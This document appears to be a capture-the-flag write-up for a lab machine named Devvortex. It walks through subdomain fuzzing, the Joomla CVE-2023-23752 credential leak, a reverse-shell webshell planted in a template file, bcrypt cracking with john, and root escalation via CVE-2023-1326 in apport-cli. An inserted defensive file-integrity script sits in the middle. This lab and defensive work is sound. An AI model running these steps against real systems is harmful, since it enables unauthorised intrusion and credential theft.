Information gathering

Port 80

sudo nmap -p- -sT --min-rate 5000  10.10.11.242
Nmap scan report for devvortex.htb (10.10.11.242)
Host is up (0.36s latency).
Not shown: 64138 closed tcp ports (conn-refused), 1395 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 77.24 seconds

Visiting http://10.10.11.242 redirects to http://devvortex.htb/; add that hostname to /etc/hosts.

Subdomains

After looking around the site nothing exploitable turns up, so continue with information gathering.

ffuf -u http://devvortex.htb -H "Host: FUZZ.devvortex.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fc 302

Add http://dev.devvortex.htb/ to the hosts file. Further enumeration reveals the admin backend address and that the site runs the Joomla CMS.

CVE-2023-23752

http://dev.devvortex.htb/administrator/

searchsploit Joomla lists a pile of vulnerabilities; the one that applies here is CVE-2023-23752.

Joomla! v4.2.8 - Unauthenticated information disclosure  |php/webapps/51334.py

Two users are found, and the password for the user lewis is P4ntherg0t1n5r3c0n##.

└─$ ./51334.py http://dev.devvortex.htb 
Users
[649] lewis (lewis) - lewis@devvortex.htb - Super Users
[650] logan paul (logan) - logan@devvortex.htb - Registered

Site info
Site name: Development
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false

Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: P4ntherg0t1n5r3c0n##
DB name: joomla
DB prefix: sd4fg_
DB encryption 0

www-data

webshell

After the SSH login with these credentials fails, log into the backend with them instead. The template file /templates/cassiopeia/error.php can be edited there; writing a reverse shell into it and then requesting the file yields a webshell, but only as the www-data user.

┌──(kali㉿kali)-[/usr/…/exploitdb/exploits/php/webapps]
└─$ nc -lnnp 5555
Linux devvortex 5.4.0-167-generic #184-Ubuntu SMP Tue Oct 31 09:21:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
07:17:27 up 58 min, 3 users, load average: 0.00, 0.02, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
logan pts/1 10.10.14.26 07:06 9:51 0.05s 0.05s -bash
logan pts/2 10.10.14.26 07:10 5:48 0.05s 0.05s -bash
logan pts/3 10.10.14.26 07:15 1:42 0.04s 0.04s -bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ whoami
www-data
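As an added defensive check (not part of the original writeup): the webshell above comes from editing a template file through the Joomla admin panel, which a file-integrity baseline over the templates directory would catch. The script below hashes every file under a templates directory, compares against a saved baseline and reports modified, added and removed files; `demo()` builds a constructed toy tree containing cassiopeia/error.php, tampers with it after baselining, and returns the report.

```python
import hashlib
import tempfile
from pathlib import Path


def snapshot(root):
    """Return {relative_path: sha256} for every regular file under root."""
    root = Path(root)
    result = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            result[path.relative_to(root).as_posix()] = digest
    return result


def compare(baseline, current):
    """Diff two snapshots; any hit on a .php template file is a webshell red flag."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Constructed example: a toy templates tree where error.php is edited after baselining."""
    with tempfile.TemporaryDirectory() as tmp:
        templates = Path(tmp) / "templates"
        (templates / "cassiopeia").mkdir(parents=True)
        error_php = templates / "cassiopeia" / "error.php"
        error_php.write_text("<?php // stock Joomla error template (constructed)\n")
        (templates / "cassiopeia" / "index.php").write_text("<?php // stock index (constructed)\n")
        baseline = snapshot(templates)
        # Simulate the admin-panel edit: a constructed placeholder, not a real payload.
        error_php.write_text("<?php // TAMPERED: injected code would go here (constructed)\n")
        return compare(baseline, snapshot(templates))


if __name__ == "__main__":
    print(demo())
```

In practice the baseline is taken right after deployment and stored off-host, and the comparison is run on a schedule or by a file-watcher so that an edit like the one above raises an alert before the file is ever requested.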

Database

Log into the database and look for the logan user's password.

mysql -h localhost -u lewis -p
Enter password: P4ntherg0t1n5r3c0n##

mysql> select username,password from sd4fg_users;
select username,password from sd4fg_users;
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| lewis | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u |
| logan | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 |
+----------+--------------------------------------------------------------+

Cracking the password with john

Write logan's hash into a file named hash and crack it with john; the password is tequieromucho.

┌──(kali㉿kali)-[~/桌面]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tequieromucho (?)
1g 0:00:00:07 DONE (2023-12-08 15:35) 0.1254g/s 176.1p/s 176.1c/s 176.1C/s lacoste..harry
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Switching to logan with su logan hits a problem: the shell has to be upgraded before the user switch succeeds.

Inside a Docker container, su username may fail with must be run from terminal; solution: click me

The most commonly used fix:

python3 -c "import pty; pty.spawn('/bin/bash')"

logan

After logging in, sudo -l shows that /usr/bin/apport-cli may be run with sudo.

logan@devvortex:/$ sudo -l
sudo -l
[sudo] password for logan: tequieromucho

Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli

Googling sudo apport-cli turns up CVE-2023-1326.

CVE-2023-1326

1. Generate a .crash file with the following commands

# Method 1
sleep 100 &
ps aux|grep sleep
kill -SEGV <pid>

# Method 2
sleep 100 &
killall -SIGSEGV sleep

The file is written to the /var/crash directory.

2. Process the file with apport-cli and choose option V; the program uses less to display the report.

sudo apport-cli -c /var/crash/xxx.crash
enter: v
after a short wait, enter: !/bin/bash
this gives a shell

Summary

nmap shows port 80 open, serving a static page with nothing exploitable. Further enumeration finds the subdomain dev, which hosts a Joomla CMS with an exposed admin login page. Searching online turns up CVE-2023-23752 (searchsploit Joomla finds the same exploit), which leaks the credentials. SSH login with them fails, but logging into the backend reveals that /templates/cassiopeia/error.php can be abused for a webshell. Through the webshell, logan's password hash is recovered from the database and cracked with john. After logging in as logan, sudo -l shows that sudo apport-cli is permitted, and CVE-2023-1326 is used to escalate to root.